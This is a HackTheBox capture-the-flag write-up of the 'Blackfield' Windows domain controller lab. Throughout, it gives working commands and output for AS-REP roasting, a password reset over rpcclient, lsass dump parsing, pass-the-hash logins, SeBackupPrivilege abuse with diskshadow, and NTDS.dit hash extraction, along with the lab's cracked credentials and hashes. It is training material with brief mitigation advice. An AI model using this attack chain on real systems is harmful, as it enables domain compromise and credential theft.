Blackfield 10.10.10.192

I know the sky is not the limit because there are footprints on the Moon — and I made some of them! #Buzz Aldrin
Completed at 23 Sep 2020

Background

Blackfield is a Windows machine from HackTheBox, that is focusing on the enumeration technique, for training your ethical hacking skills and penetration testing skills.

After basic enumeration, this Windows server was a Domain Controller (DC) in the blackfield.local domain. After reconnaissance, a set of user's account was publicly available to view. This DC used Kerberos service. With this user list, I got a non-preauth AS_REP response. Finally, I got the access of a user 'support' account.

Using this support account, I reset the password of a user "Audit2020" and got access to this account. This account has the access rights on the ‘forensic’ shared folder and through this shared folder I could download several files, among others lass.dmp. Decode this file, I got the NTLM hash of the user account svc_backup.

This svc_backup account is the service account for system backup that is a member of the Security Group ‘Backup Operators’. This account has rights to back the critical file, NTDS.dit , and also has permission to execute the program DiskShadow.exe.

After retrieved the NTDS file and decoded it, I go the NTLM hash of the administrative account. [email protected]

Target Machine: 10.10.10.192

Attacker Machine: 10.10.14.8

Hacking Process Part 0 – Service Scanning

Quick Pre-searching

nmap -p- -T5 --min-rate=1000 10.10.10.192 -oG fkclai.nmap

Details Analysis

nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.192 -o nmap-result.txt

Enumeration strategies According to the nmap result, the target machine is a Domain Controller in the backfield.local , this server has the hostname DC01, the interesting ports are tcp/445 for SMB, 88/tcp for Kerberos, and 389/tcp for LDAP.

  1. Check SMB (445)

  2. Check kerberos-sec (88)

  3. Check LDAP (339)

Hacking Process Part 1 – Enumeration

SMB Enumeration

Started with the enumeration of the SMB protocol by checking the default account access, but nothing information returned. After that, using enum4linux gethered the SMB service of target machine and didn't have any usful information.

smbmap -u "guest" -p "" -H 10.10.10.192
enum4linux 10.10.10.192

Two shared folders (forensic, profiles$) are found using the smbclient and a list of user profile folder list is found at the //10.10.10.192/profiles$. It may be useful, let check this user list using

Hacking Process Part 2 – Initial Low Privilege Access

Enumeration through RPC

As the target provides the AD service, let use the folder name to create a user list file and check with GetNPUsers.py program to find out the "real" user account actually present in the Active Directory and try to capture the NTLM hash. Exported the shares to a file named ‘userlist.txt’, and check of the usernames are existing and if they have Kerberos pre-authentication enabled, using the parament -format john that sent founded captured Ticket-Gain-Tickets to john for cracking. Finally, the following three accounts existed at the Active Directory and the password of "support was found. 1. audit2020 2. support 3. svc_backup

python /root/Documents/ctf/tools/win/impacket-0.9.20/examples/GetNPUsers.py blackfield.local/ -usersfile userlist.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
Password of the user account [email protected] was found #00^BlackKnight

Initial access with the account "support"

Login the "blackfield.local/support" account with the password ":#00^BlackKnight". It was confirmed that the user list and user gourp of the AD service. After futher recon, this account cannot access other SMB share folder and no other information can be found under this . Before swithing to other strategy, if it is a "support" account, can I do some support service, such as create account, reset account password...etc.

Googled an article explains how to change a password via rpcclient. Finally, I was able to change the password of the account audit2020 to ‘[email protected]’.

~$ rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
~$ rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]

Jump to account "audit2020"

This user account can access the share folder "forensic". Jumped to this user "aduit2020", however, no luck to get the user flag. It is not the target user account. I downloaded all the files at this forensic account and found a interesting file lass.DMP under memory_analysis folder.

~$ smbclient //10.10.10.192/forensic -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
Enter BLACKFIELD.LOCAL\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
7846143 blocks of size 4096. 4108744 blocks available
smb: \> smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (3.8 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (6.8 KiloBytes/sec) (average 5.3 KiloBytes/sec)
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (110.8 KiloBytes/sec) (average 41.6 KiloBytes/sec)
getting file \commands_output\firewall_rules.txt of size 518202 as firewall_rules.txt (1284.4 KiloBytes/sec) (average 642.4 KiloBytes/sec)
getting file \commands_output\ipconfig.txt of size 1782 as ipconfig.txt (12.2 KiloBytes/sec) (average 548.4 KiloBytes/sec)
getting file \commands_output\netstat.txt of size 3842 as netstat.txt (27.6 KiloBytes/sec) (average 483.6 KiloBytes/sec)
getting file \commands_output\route.txt of size 3976 as route.txt (28.1 KiloBytes/sec) (average 432.6 KiloBytes/sec)
getting file \commands_output\systeminfo.txt of size 4550 as systeminfo.txt (30.2 KiloBytes/sec) (average 389.7 KiloBytes/sec)
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (69.2 KiloBytes/sec) (average 360.0 KiloBytes/sec)
getting file \memory_analysis\conhost.zip of size 37876530 as conhost.zip (1599.9 KiloBytes/sec) (average 1523.4 KiloBytes/sec)
getting file \memory_analysis\ctfmon.zip of size 24962333 as ctfmon.zip (1704.1 KiloBytes/sec) (average 1589.8 KiloBytes/sec)
getting file \memory_analysis\dfsrs.zip of size 23993305 as dfsrs.zip (1727.9 KiloBytes/sec) (average 1625.5 KiloBytes/sec)
getting file \memory_analysis\dllhost.zip of size 18366396 as dllhost.zip (1628.9 KiloBytes/sec) (average 1626.1 KiloBytes/sec)
getting file \memory_analysis\ismserv.zip of size 8810157 as ismserv.zip (1689.3 KiloBytes/sec) (average 1630.8 KiloBytes/sec)
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (1658.7 KiloBytes/sec) (average 1638.2 KiloBytes/sec)

memory_analysis\lsass.DMP

There is a program "volatility" under tool folder which can be used for analyzing memory dumps. This lasass.DMP may be the dump result from lsass.exe, which contains the password hash.

Tried read out the lsass.dmp using different method, first I tried with volatility to read out the DMP file, but couldn’t get it to work on my Kali machine. Finally, used the Python version of Mimikatz, pypykatz. Lucky, another user account "svc_backup" was found with a NTLM hash.

~$ pypykatz lsa minidump lsass.DMP
INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
== SSP [633ba]==
username
domainname
password None
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
Password: None
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None

Using the Evil-WinRM I can just pass the hash to login

~$ evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

This account "svc_backup" have the user flag at the Desktop folder. Let's go for Privilege Escalation.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls
Directory: C:\Users\svc_backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/18/2020 6:53 PM 34 user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
dfe91a601341819d2ca0cca082495551

Hacking Process Part 3 – Privilege Escalation

The support account has the support fuction, audit account can access the backup file, will this svc_backup account has system backup function?

Starting check who am i and what access rights I have, A quick check on the privileges of this account that this user is member of the group "Backup Operations" and it have two ‘extra’ privileges, i.e. SeBackupPrivilege and SeRestorePrivilege which are able to back-up critical system files on this Domain Controller.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 10:54:48 AM
Password expires Never
Password changeable 2/24/2020 10:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/23/2020 11:03:50 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_backup\Documents>

My target is to get the NTDS.dit file by creating a Volume Shadow Copy which the files are being locked. In addition, I need the SYSTEM hive from the registry which is containing the boot key, which is used to decrypt the NTDS.dit. Googled, diskshadow.exe is the program to use to create Volume Shadow Snapshots (VSS) of disks and expose them as a folder or as a Driveletter.

Get the NTDS.dit

Even the SeBackupPrivilege is enable, but the system security still not allow me to dump the ntds.dit file. First we need to get the permissions in the file NTDS.dit by following the instruction of this https://github.com/giuliano108/SeBackupPrivilege

Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module ./Set-SeBackupPrivilege.dll
Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module ./SeBackupPrivilegeUtils.dll
Evil-WinRM* PS C:\Users\svc_backup\Documents> Set-SeBackupPrivilege

Once I have the privileges, next steps, execute the program DiskShadow.exe with the scripts (DiskShadow.exe /s ), which is creating a Volume Shadow Copy and expose the VSS with the Driveletter Z:.

set context persistent nowriters
set metadata c:\temp\example.cab
set verbose on
begin backup
add volume c:\ alias systemvolume
create
expose %systemvolume% z:
end backup
Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/22/2020 3:00:44 PM
-> set context persistent nowriters
-> set metadata c:\temp\example.cab
-> set verbose on
-> begin backup
-> add volume c:\ alias systemvolume
-> create
Alias systemvolume for shadow ID {a402221f-ec65-43af-b956-3e2baa45fa43} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {2520bff5-0a72-46f3-b718-e47519722936} set as environment variable.
Inserted file Manifest.xml into .cab file example.cab
Inserted file Dis5346.tmp into .cab file example.cab
Querying all shadow copies with the shadow copy set ID {2520bff5-0a72-46f3-b718-e47519722936}
* Shadow copy ID = {a402221f-ec65-43af-b956-3e2baa45fa43} %systemvolume%
- Shadow copy set: {2520bff5-0a72-46f3-b718-e47519722936} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 9/22/2020 3:00:44 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %systemvolume% z:
-> %systemvolume% = {a402221f-ec65-43af-b956-3e2baa45fa43}
The shadow copy was successfully exposed as z:\.
-> end backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents>

Using the Copy-FileSeBackupPrivilege to get the ntds.dit file and the system.bak (the key of this ntds) that get from the registry

*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege z:\window\ntds\ntds.dit C:\Users\svc_backup\Documents\ntds.dit
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit
Info: Downloading C:\Users\svc_backup\Documents\ntds.dit to ntds.dit
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\system .\system.bak
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.bak
Info: Downloading C:\Users\svc_backup\Documents\system.bak to system.bak
Info: Download successful!

With the secretsdump.py to extract the NTDS.dit and read the hashes.

[email protected]:~/Documents/ctf/htb/windows/16_Blackfield/exploit/audit2020_file# /root/Documents/ctf/tools/win/impacket-0.9.20/examples/secretsdump.py -ntds ./ntds.dit -system ./system.bak LOCAL >dumpntds.txt
[email protected]:~/Documents/ctf/htb/windows/16_Blackfield/exploit/audit2020_file# cat dumpntds.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ./ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9e3d10cc537937888adcc0d918813a24:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98

Dumping to the Administrator account

With the administrator's NTML hash using the Evil-WinRM to create a session with the Administrator-account.

[email protected]:~/Documents/ctf/tools/win/evil-winrm# ./evil-winrm.rb -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i 10.10.10.192
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator

Got the root key

Post Exploitation

*Evil-WinRM* PS C:\Users\Administrator\desktop> type notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
*Evil-WinRM* PS C:\Users\Administrator\desktop> systeminfo
Host Name: DC01
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA435
Original Install Date: 2/1/2020, 12:04:40 PM
System Boot Time: 9/23/2020, 3:11:49 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: fr;French (France)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,540 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,387 MB
Virtual Memory: In Use: 1,412 MB
Page File Location(s): C:\pagefile.sys
Domain: BLACKFIELD.local
Logon Server: \\DC01
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB4552924
[02]: KB4494174
[03]: KB4512577
[04]: KB4523204
[05]: KB4537759
[06]: KB4549947
[07]: KB4565349
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.192
[02]: fe80::fc75:4ec7:3972:a98a
[03]: dead:beef::fc75:4ec7:3972:a98a
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Recommendation

This Lab is a sample of Kerberoasting attack, how to prevent it....

Mitigating the brute-forcing aspect of the attack, using the offline brute-force attack the hash dump file to get the initial access acount. Choosing a strong complex password for system account.

SMB Sharing, becareful what kinds of information be shared that may be used to exploitation. If I cannot get the potential user account list, the brute-force attack cannot be success.

Think about what your service accounts have access to, special privilege account can be a risk vectors for unauthorized access.

Reference Link

https://decoder.cloud/2018/02/12/the-power-of-backup-operatos/ https://serverfault.com/questions/990231/windows-backup-operators-and-network-access https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug https://github.com/giuliano108/SeBackupPrivilege https://pure.security/dumping-windows-credentials/ https://pentestlab.blog/tag/ntds-dit/